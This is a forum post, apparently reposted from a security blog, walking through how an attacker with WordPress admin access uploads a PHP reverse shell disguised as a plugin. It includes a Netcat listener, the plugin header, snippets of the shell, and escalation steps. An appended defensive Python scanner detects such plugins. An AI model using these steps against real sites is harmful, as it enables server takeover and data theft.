Fi8sVrs, posted June 12, 2018 (edited)

Shout out to Chaos Monkey and DustinFinn on Twitter.

Did you ever want to know how hackers get a reverse shell by compromising your WordPress install? Well, wonder no more!

After obtaining admin access to your WordPress (this means we either leveraged an existing vulnerability on your site that you didn't patch, guessed your password, or cracked the hash if we were able to obtain it, also by leveraging a vuln), we trick your WordPress into thinking we're installing a plugin when in reality we're uploading a shell script which connects us to your underlying file server.

So the pre-req is to have admin access to the WordPress site in order for this vector to work. We cannot add plugins or themes as a guest or some other user.

After that we go into the Plugins section of the dashboard and add a new one.

On our attack box (this is the computer we are going to use to catch the shell into your fileserver) we open up a Netcat listener by going into Terminal and typing something like this:

    nc -lvp 1337

nc stands for Netcat, -lvp is listen, verbose and port, and 1337 is the port number on our attack box we are listening on.

We then create a text file which will contain our shell. For this example let's use Pentest Monkey's reverse shell. On Kali Linux it is located here:

    /usr/share/webshells/php/php-reverse-shell.php

We copy the contents of the reverse shell into the blank text file. At the top of the file, right under <?php, we insert the lines needed for a WordPress plugin, called a header. It doesn't matter what it says. The header starts with /* and ends with */:

    <?php
    /*
    Plugin Name: BlackRoomSec's Evil Reverse Shell
    Plugin URI: https://www.blackroomsec.com
    Description: Gets Tara into your cybers, duh!
    Version: 1.0 baby
    Author: BRS
    Author URI: http://www.blackroomsec.com
    Text Domain: evil-shell
    Domain Path: /languages
    */

Then underneath that is the shell script (I snipped this):

    set_time_limit (0);
    $VERSION = "1.0";
    $ip = '10.10.10.10';  // CHANGE THIS
    $port = 1337;         // CHANGE THIS
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; /bin/sh -i';
    $daemon = 0;
    $debug = 0;

    //
    // Daemonise ourself if possible to avoid zombies later
    //

    // pcntl_fork is hardly ever available, but will allow us to daemonise

We change these two lines:

    $ip = '10.10.10.10';  // CHANGE THIS
    $port = 1337;         // CHANGE THIS

to the IP address of the attack box we are using to catch the shell. If we're practicing and doing the attack on a vulnerable machine on our own network or on the same subnet, nothing else is needed. However, in some cases, if we are attacking a site on the Internet and want to reverse that into our box, we have to either forward our ports to accept incoming traffic, OR we can use an attack box that is publicly accessible like a free-tiered Amazon EC2 instance or Google instance. In that case we would use the Public IP address of that system, start a Netcat listener on THAT system and then issue commands from there.

The file then gets saved. We then compress the file in .ZIP format, as that is the format needed for WordPress plugins and themes. We click install inside WordPress. It says it installs. And then once we hit "activate" our shell will be popped in our Terminal that was listening on port 1337.

This gets us in as the www-data user typically. Or, in other words, GUEST. We now need to escalate our privileges by finding a way further into the box. This involves a number of enumeration techniques, but typically we will first find a directory that www-data can access and write to. Usually the /tmp/ directory.

How we test write capabilities is we issue the command

    touch test

where touch is the command to create a blank file and "test" is the name of the file. You can call it anything. Then we will copy our enumeration scripts into the files we create, make them executable (chmod +x filename), run them and see what the results give us.

Our goal is to get to the root user. Once we get root it's an End Game scenario for you. We have complete control over your fileserver. Can create users, delete them, change passwords, anything we want.

DM me on Twitter with questions. I have them open again for the time being.

Source: blackroomsec.com

Edited June 12, 2018 by OKQL
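From the defender's side, here is an added example (my own code, not from the post above or from blackroomsec) that scans the files under wp-content/plugins for the shape this post describes: a file that carries a WordPress plugin header and also opens a raw socket and hands it an interactive /bin/sh. The two sample plugin sources and the 203.0.113.5 address are constructed for the demo.

```python
"""Scan WordPress plugin sources for the header-plus-reverse-shell pattern."""
import re
from pathlib import Path
# WordPress reads plugin metadata from a comment header like the one above.
PLUGIN_HEADER = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+)$", re.MULTILINE)

# Indicators taken from the reverse-shell shape described in the post.
INDICATORS = {
    "socket_to_remote": re.compile(r"\bfsockopen\s*\("),
    "spawns_interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i"),
    "daemonise_fork": re.compile(r"\bpcntl_fork\s*\("),
    "process_with_pipes": re.compile(r"\bproc_open\s*\("),
    "disables_time_limit": re.compile(r"\bset_time_limit\s*\(\s*0\s*\)"),
}

def scan_plugin_source(source: str) -> dict:
    """Return the declared plugin name (if any) and the indicators that matched."""
    header = PLUGIN_HEADER.search(source)
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    return {"plugin_name": header.group(1).strip() if header else None, "hits": hits}

def is_suspicious(result: dict) -> bool:
    """Flag a file that both opens a socket and spawns an interactive shell."""
    return {"socket_to_remote", "spawns_interactive_shell"} <= set(result["hits"])

def scan_plugin_dir(plugins_dir) -> list:
    """Walk wp-content/plugins; return (path, result) for each suspicious PHP file."""
    findings = []
    for php in Path(plugins_dir).rglob("*.php"):
        result = scan_plugin_source(php.read_text(errors="replace"))
        if is_suspicious(result):
            findings.append((str(php), result))
    return findings

# Constructed samples, not real plugins: a harmless header-only file and the
# header-plus-shell shape described above (address is from a documentation range).
BENIGN_SAMPLE = """<?php
/*
Plugin Name: Hello World
*/
add_action('init', function () { return true; });
"""
SHELL_SAMPLE = """<?php
/*
Plugin Name: Example Shell Plugin
*/
set_time_limit(0);
$sock = fsockopen('203.0.113.5', 1337);
$shell = 'uname -a; w; id; /bin/sh -i';
"""
```

Run scan_plugin_dir against your real wp-content/plugins path from cron and alert on any finding, and pair it with define('DISALLOW_FILE_MODS', true); in wp-config.php, which removes the dashboard plugin and theme upload path this post depends on.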